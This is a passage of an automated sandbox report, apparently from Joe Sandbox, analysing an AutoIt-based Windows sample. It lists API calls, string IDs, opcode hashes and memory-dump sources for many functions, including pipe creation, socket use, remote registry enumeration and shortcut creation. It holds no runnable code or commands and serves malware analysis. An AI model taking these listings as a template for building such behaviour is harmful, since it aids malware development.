                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2610073882-625585964
                                                • Opcode ID: 8d03a121ef619b3e10ecaafe02747fa7c466125ce1600f4d9a5ff96acf1f1de5
                                                • Instruction ID: 6fc0d118fdedcc6428fe8cf84f5690b2a994251a52423cd4b945332305fea914
                                                • Opcode Fuzzy Hash: 8d03a121ef619b3e10ecaafe02747fa7c466125ce1600f4d9a5ff96acf1f1de5
                                                • Instruction Fuzzy Hash: 4E918E71A00319ABDF21CFA5CC44FAEBBB8EF45714F108559F619AB280DB70A945CFA0
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 003F42C8
                                                • CharUpperBuffW.USER32(?,?), ref: 003F43D7
                                                • _wcslen.LIBCMT ref: 003F43E7
                                                • VariantClear.OLEAUT32(?), ref: 003F457C
                                                  • Part of subcall function 003E15B3: VariantInit.OLEAUT32(00000000), ref: 003E15F3
                                                  • Part of subcall function 003E15B3: VariantCopy.OLEAUT32(?,?), ref: 003E15FC
                                                  • Part of subcall function 003E15B3: VariantClear.OLEAUT32(?), ref: 003E1608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4137639002-1221869570
                                                • Opcode ID: 0f548740d5e06064b64c200a3bfeeccb40a19572dd55e1540bdc1c3326021613
                                                • Instruction ID: 97627ef4f880581b2831cf1a61b19d0ac5bdc91cf15fb2ec4eb05e148bef9986
                                                • Opcode Fuzzy Hash: 0f548740d5e06064b64c200a3bfeeccb40a19572dd55e1540bdc1c3326021613
                                                • Instruction Fuzzy Hash: 1F9177746083059FC711EF68C48196AB7E5FF88314F14892EF98A9B351DB34ED06CB82
                                                APIs
                                                • GetMenu.USER32(?), ref: 00402AE2
                                                • GetMenuItemCount.USER32(00000000), ref: 00402B14
                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00402B3C
                                                • _wcslen.LIBCMT ref: 00402B72
                                                • GetMenuItemID.USER32(?,?), ref: 00402BAC
                                                • GetSubMenu.USER32(?,?), ref: 00402BBA
                                                  • Part of subcall function 003D42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003D42E6
                                                  • Part of subcall function 003D42CC: GetCurrentThreadId.KERNEL32 ref: 003D42ED
                                                  • Part of subcall function 003D42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003D2E43), ref: 003D42F4
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00402C42
                                                  • Part of subcall function 003DF1A7: Sleep.KERNEL32 ref: 003DF21F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                • String ID:
                                                • API String ID: 4196846111-0
                                                • Opcode ID: 2cd8f4a2d4c13a45774dd3f80a4d32d0a76e14005e46dd5cd9915ac88faa72ac
                                                • Instruction ID: 25fddec4cf3db6477211e2929205b5891d0c4700f75ae741c3a70cf23ac9fa84
                                                • Opcode Fuzzy Hash: 2cd8f4a2d4c13a45774dd3f80a4d32d0a76e14005e46dd5cd9915ac88faa72ac
                                                • Instruction Fuzzy Hash: 15719235A00205AFDB11EFA4C945AAEB7F5EF48310F10846AE816BB391DB78ED418F94
                                                APIs
                                                • IsWindow.USER32(00000000), ref: 00408896
                                                • IsWindowEnabled.USER32(00000000), ref: 004088A2
                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0040897D
                                                • SendMessageW.USER32(00000000,000000B0,?,?), ref: 004089B0
                                                • IsDlgButtonChecked.USER32(?,00000000), ref: 004089E8
                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 00408A0A
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00408A22
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                • String ID:
                                                • API String ID: 4072528602-0
                                                • Opcode ID: 804f27c4b23fef6f12d1816ddeb79035b22cecb9a4bafcd83f3c6563bc20f642
                                                • Instruction ID: e65cb526f031d742acbf6e015d3f5247273554df8b1958121c5d43fca58212b3
                                                • Opcode Fuzzy Hash: 804f27c4b23fef6f12d1816ddeb79035b22cecb9a4bafcd83f3c6563bc20f642
                                                • Instruction Fuzzy Hash: C571C074600204AFEF21AF54CA84FBB7BB5EF49300F54447EE885673A1CB39A951CB19
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003D80D1
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003D80F7
                                                • SysAllocString.OLEAUT32(00000000), ref: 003D80FA
                                                • SysAllocString.OLEAUT32 ref: 003D811B
                                                • SysFreeString.OLEAUT32 ref: 003D8124
                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 003D813E
                                                • SysAllocString.OLEAUT32(?), ref: 003D814C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: ea9f8ea7f5504b96aabd52b7d39e93b353323f0f3c34463e8e5530632218ad97
                                                • Instruction ID: e73961fd418904af555f1f41bc094f544d49cd3c765f6557045ece8e1f21c21f
                                                • Opcode Fuzzy Hash: ea9f8ea7f5504b96aabd52b7d39e93b353323f0f3c34463e8e5530632218ad97
                                                • Instruction Fuzzy Hash: 05218676600214BFDF119FB8DC88DAA77ECEB493607018126F915DB3A0DA70EC49CB68
                                                APIs
                                                • GetStdHandle.KERNEL32(0000000C), ref: 003E0DAE
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003E0DEA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateHandlePipe
                                                • String ID: nul
                                                • API String ID: 1424370930-2873401336
                                                • Opcode ID: 52567d6c4baaf44bf492ffacff9cd3dc820077748b4e36560a1be06523b79970
                                                • Instruction ID: cf2a8b7d7aea45bd60e3d219ff7d1beeae6c5f2d2ef79f6fc03c0c17eb9ec564
                                                • Opcode Fuzzy Hash: 52567d6c4baaf44bf492ffacff9cd3dc820077748b4e36560a1be06523b79970
                                                • Instruction Fuzzy Hash: 2A216070500755EFDF259FA6DC04A9ABBE4AF95760F204F29F9A1E72E0D7B09880CB50
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 003E0E82
                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003E0EBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                 • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                 • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateHandlePipe
                                                • String ID: nul
                                                • API String ID: 1424370930-2873401336
                                                • Opcode ID: 4a5e449ae6864fddb5caa70b178adca7e640c3e90ceda4c8372b5540ee44f515
                                                • Instruction ID: 7a59bb39893f708c959736697922fd01c57bdcbb4bc15cb081164448ab3f50c0
                                                • Opcode Fuzzy Hash: 4a5e449ae6864fddb5caa70b178adca7e640c3e90ceda4c8372b5540ee44f515
                                                • Instruction Fuzzy Hash: B021B271500365ABDB359F6ADC04A9AB7E8EF55324F200B29FDE1E72E0D7B09891CB10
                                                APIs
                                                  • Part of subcall function 0037771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00377759
                                                  • Part of subcall function 0037771B: GetStockObject.GDI32(00000011), ref: 0037776D
                                                  • Part of subcall function 0037771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00377777
                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00404A71
                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00404A7E
                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00404A89
                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00404A98
                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00404AA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend$CreateObjectStockWindow
                                                • String ID: Msctls_Progress32
                                                • API String ID: 1025951953-3636473452
                                                • Opcode ID: cc2dc0851706f258366917f28715ef2db1949015450b3c808b0981e4df824f71
                                                • Instruction ID: fadf9541b0c4c77dda25acfc06d4255b906661feff6ac3e932764a0c2d0ed32f
                                                • Opcode Fuzzy Hash: cc2dc0851706f258366917f28715ef2db1949015450b3c808b0981e4df824f71
                                                • Instruction Fuzzy Hash: 2F11B6B224021DBEEF119F64CC81EE77F9DEF08758F004121FB18A6190C6759C219BA8
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003DE23D
                                                • LoadStringW.USER32(00000000), ref: 003DE244
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003DE25A
                                                • LoadStringW.USER32(00000000), ref: 003DE261
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003DE2A5
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 003DE282
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 4072794657-3128320259
                                                • Opcode ID: 28541a11b3fb71b08b9fc596094a2a4d4d4c5ce410a1fa5812924024751b965f
                                                • Instruction ID: 0575b7a41e8b6733749281ee030731d53e205db6f7dd689a8a9abe101e699b67
                                                • Opcode Fuzzy Hash: 28541a11b3fb71b08b9fc596094a2a4d4d4c5ce410a1fa5812924024751b965f
                                                • Instruction Fuzzy Hash: 280136F6D002087FE711A7D4DE89EE7776CEB08304F0149A2B746F6141EA749E888B75
                                                APIs
                                                • __allrem.LIBCMT ref: 003A044A
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A0466
                                                • __allrem.LIBCMT ref: 003A047D
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A049B
                                                • __allrem.LIBCMT ref: 003A04B2
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A04D0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                • String ID:
                                                • API String ID: 1992179935-0
                                                • Opcode ID: 3b686d4a0d755d779951a52b9d8f837eb1b99ccf419568f28e31d38a071957b4
                                                • Instruction ID: 5283cfc82b236e13ab0577d981c5384c44aea3a4a6ba6f00a6cc704fbbc93dd2
                                                • Opcode Fuzzy Hash: 3b686d4a0d755d779951a52b9d8f837eb1b99ccf419568f28e31d38a071957b4
                                                • Instruction Fuzzy Hash: 50810876A007069BDB2A9F79CC81B6BB3E8EF46724F25452EF611DB6C1E770D9008B50
                                                APIs
                                                  • Part of subcall function 003F3AA6: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,003F1979,00000000,?,?,00000000), ref: 003F3AF2
                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 003F271D
                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003F273E
                                                • WSAGetLastError.WSOCK32 ref: 003F274F
                                                • inet_ntoa.WSOCK32(?), ref: 003F27E9
                                                • htons.WSOCK32(?,?,?,?,?), ref: 003F2838
                                                • _strlen.LIBCMT ref: 003F2892
                                                  • Part of subcall function 003D4277: _strlen.LIBCMT ref: 003D4281
                                                  • Part of subcall function 003786FE: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0038C15A,?,?,?), ref: 0037871A
                                                  • Part of subcall function 003786FE: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0038C15A,?,?,?,?,0037AEB9,?,?), ref: 0037874D
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                • String ID:
                                                • API String ID: 1923757996-0
                                                • Opcode ID: 3b293f90a4de06a1cfeef744a4e5221f199a83e1ff22a64c71e5dadeae499a44
                                                • Instruction ID: 3adb3c846538da3e836e68badd1612561811d70b8f0a4d5885212123cd62b280
                                                • Opcode Fuzzy Hash: 3b293f90a4de06a1cfeef744a4e5221f199a83e1ff22a64c71e5dadeae499a44
                                                • Instruction Fuzzy Hash: 6EA1DF31504305EFD326EF24C885E2B7BA8AF84314F54855CF69A9F2A2CB71ED46CB91
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00398669,00398669,?,?,?,003A67DF,00000001,00000001,8BE85006), ref: 003A65E8
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003A67DF,00000001,00000001,8BE85006,?,?,?), ref: 003A666E
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003A6768
                                                • __freea.LIBCMT ref: 003A6775
                                                  • Part of subcall function 003A3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00396A99,?,0000015D,?,?,?,?,003985D0,000000FF,00000000,?,?), ref: 003A3BE2
                                                • __freea.LIBCMT ref: 003A677E
                                                • __freea.LIBCMT ref: 003A67A3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: 0098200ebeee5c51b7b9fc14a888325932ce6a1d559099e8fbc913058da8c5d4
                                                • Instruction ID: 856ac43ad4b457821991cefb46a405910e4ac742564e61a4a8a49244addfd734
                                                • Opcode Fuzzy Hash: 0098200ebeee5c51b7b9fc14a888325932ce6a1d559099e8fbc913058da8c5d4
                                                • Instruction Fuzzy Hash: 3151F372610216AFDB278F64CC82EBF77AAEF46754F1A4228FC14DA150EB35DC44C6A0
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003FD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003FC00D,?,?), ref: 003FD314
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD350
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3C7
                                                  • Part of subcall function 003FD2F7: _wcslen.LIBCMT ref: 003FD3FD
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003FC629
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003FC684
                                                • RegCloseKey.ADVAPI32(00000000), ref: 003FC6C9
                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003FC6F8
                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003FC752
                                                • RegCloseKey.ADVAPI32(?), ref: 003FC75E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                • String ID:
                                                • API String ID: 1120388591-0
                                                • Opcode ID: 8fe970ae6ad2da46ebe4ac4334e8dfe75eec2439d891b70d9a5e46c6c608c823
                                                • Instruction ID: 7624ee860736860d49cd909006aa94e7e1ec145f17077bf953ef798e947308c8
                                                • Opcode Fuzzy Hash: 8fe970ae6ad2da46ebe4ac4334e8dfe75eec2439d891b70d9a5e46c6c608c823
                                                • Instruction Fuzzy Hash: F4819D31218249AFD716DF24C984E3ABBF5BF84308F14955CF5998B2A2DB31ED09CB91
                                                APIs
                                                • VariantInit.OLEAUT32(00000035), ref: 003D0049
                                                • SysAllocString.OLEAUT32(00000000), ref: 003D00F0
                                                • VariantCopy.OLEAUT32(003D02F4,00000000), ref: 003D0119
                                                • VariantClear.OLEAUT32(003D02F4), ref: 003D013D
                                                • VariantCopy.OLEAUT32(003D02F4,00000000), ref: 003D0141
                                                • VariantClear.OLEAUT32(?), ref: 003D014B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCopy$AllocInitString
                                                • String ID:
                                                • API String ID: 3859894641-0
                                                • Opcode ID: 3011fb2ab0493e49964c59ef6d6cd003ac23837871e2adbd8505e71ac3e3464b
                                                • Instruction ID: baffafbb5fcf8c285301df6a9522875e3b5976873e2c0909c06325a02604774e
                                                • Opcode Fuzzy Hash: 3011fb2ab0493e49964c59ef6d6cd003ac23837871e2adbd8505e71ac3e3464b
                                                • Instruction Fuzzy Hash: D3512A36940310ABCF2AAB74B885B29B3B9EF46B10F14944BE905DF396DB709C44CB95
                                                APIs
                                                • _wcslen.LIBCMT ref: 003E6E36
                                                • CoInitialize.OLE32(00000000), ref: 003E6F93
                                                • CoCreateInstance.OLE32(00410CC4,00000000,00000001,00410B34,?), ref: 003E6FAA
                                                • CoUninitialize.OLE32 ref: 003E722E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: b6df3e94cf7b1b6f84cc07d4c577101de968f490095f5941f5ae0b658104c5b9
                                                • Instruction ID: b0f38673f7fd43b0e81584d9d0bdbbe2d739e9dfb5489f997486ce460885d614
                                                • Opcode Fuzzy Hash: b6df3e94cf7b1b6f84cc07d4c577101de968f490095f5941f5ae0b658104c5b9
                                                • Instruction Fuzzy Hash: AFD15A71508241AFC315EF24C881E6BB7E8FF98704F10896DF1998B2A2DB70ED05CB92
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,003CFB8F,00000000,?,?,00000000,?,003B39BC,00000004,00000000,00000000), ref: 00408BAB
                                                • EnableWindow.USER32(?,00000000), ref: 00408BD1
                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00408C30
                                                • ShowWindow.USER32(?,00000004), ref: 00408C44
                                                • EnableWindow.USER32(?,00000001), ref: 00408C6A
                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00408C8E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
